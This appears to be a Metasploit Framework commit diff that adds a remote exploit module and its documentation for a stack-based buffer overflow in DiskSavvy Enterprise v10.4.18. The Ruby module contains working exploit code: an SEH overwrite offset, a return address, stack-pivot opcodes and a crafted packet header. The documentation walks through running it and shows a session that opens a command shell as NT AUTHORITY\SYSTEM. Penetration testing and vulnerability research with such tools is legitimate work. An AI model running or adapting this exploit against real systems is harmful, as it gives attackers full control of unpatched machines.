Land rapid7#9561, Disk Savvy Enterprise v10.4.18 built-in server buffer overflow

Author: jrobles-r7

documentation/modules/exploit/windows/misc/disk_savvy_adm.md

@@ -0,0 +1,39 @@
+## Vulnerable Application
+
+[DiskSavvy Enterprise](http://www.disksavvy.com/) version v10.4.18, affected by a stack-based buffer overflow vulnerability caused by improper bounds checking of the request sent to the built-in server which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target.. This module has been tested successfully on Windows 7 SP1 x86. The vulnerable application is available for download at [DiskSavvy Enterprise](http://www.disksavvy.com/setups/disksavvyent_setup_v10.4.18.exe).
+
+## Verification Steps
+  1. Install a vulnerable DiskSavvy Enterprise
+  2. Start `msfconsole`
+  3. Do `use exploit/windows/misc/disk_savvy_adm`
+  4. Do `set RHOST ip`
+  5. Do `set PAYLOAD windows/shell/bind_tcp`
+  6. Do `exploit`
+  7. Enjoy your shell
+
+## Scenarios
+
+### DiskSavvy Enterprise v10.4.18 on Windows 7 SP1 x86
+
+```
+msf > use exploit/windows/misc/disk_savvy_adm 
+msf exploit(windows/misc/disk_savvy_adm) > set RHOST 192.168.216.55
+RHOST => 192.168.216.55
+msf exploit(windows/misc/disk_savvy_adm) > set payload windows/shell/bind_tcp
+payload => windows/shell/bind_tcp
+msf exploit(windows/misc/disk_savvy_adm) > exploit 
+
+[*] Started bind handler
+[*] Encoded stage with x86/shikata_ga_nai
+[*] Sending encoded stage (267 bytes) to 192.168.216.55
+[*] Command shell session 1 opened (192.168.216.5:36113 -> 192.168.216.55:4444) at 2018-02-14 15:19:02 -0500
+
+Microsoft Windows [Version 6.1.7601]
+Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
+
+C:\Windows\system32>whoami      
+whoami
+nt authority\system
+
+C:\Windows\system32>
+```

modules/exploits/windows/misc/disk_savvy_adm.rb

@@ -0,0 +1,77 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Disk Savvy Enterprise v10.4.18',
+      'Description'    => %q{
+        This module exploits a stack-based buffer overflow vulnerability
+        in Disk Savvy Enterprise v10.4.18, caused by improper bounds
+        checking of the request sent to the built-in server. This module
+        has been tested successfully on Windows 7 SP1 x86.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Daniel Teixeira'
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00\x02\x0a\x0d\xf8",
+          'Space'      => 800
+        },
+      'Targets'        =>
+        [
+          [ 'Disk Savvy Enterprise v10.4.18',
+            {
+              'Offset' => 124,
+              'Ret'    => 0x10056d13
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Jan 31 2017',
+      'DefaultTarget'  => 0))
+
+    register_options([Opt::RPORT(9124)])
+
+  end
+
+  def exploit
+    seh = generate_seh_record(target.ret)
+    connect
+
+    buffer = make_nops(target['Offset'])
+    buffer << seh
+    buffer << "\x83\xc4\x7f" * 13   #ADD esp,7fh
+    buffer << "\x83\xc4\x21"        #ADD esp,21h
+    buffer << "\xff\xe4"            #JMP esp
+    buffer << payload.encoded
+    buffer << Rex::Text.rand_text_alphanumeric(1)
+
+    header = "\x75\x19\xba\xab"
+    header << "\x03\x00\x00\x00"
+    header << "\x00\x40\x00\x00"
+    header << [buffer.length].pack("V")
+    header << [buffer.length].pack("V")
+    header << [buffer[-1].ord].pack("V")
+    packet = header
+    packet << buffer
+
+    sock.put(packet)
+    handler
+  end
+end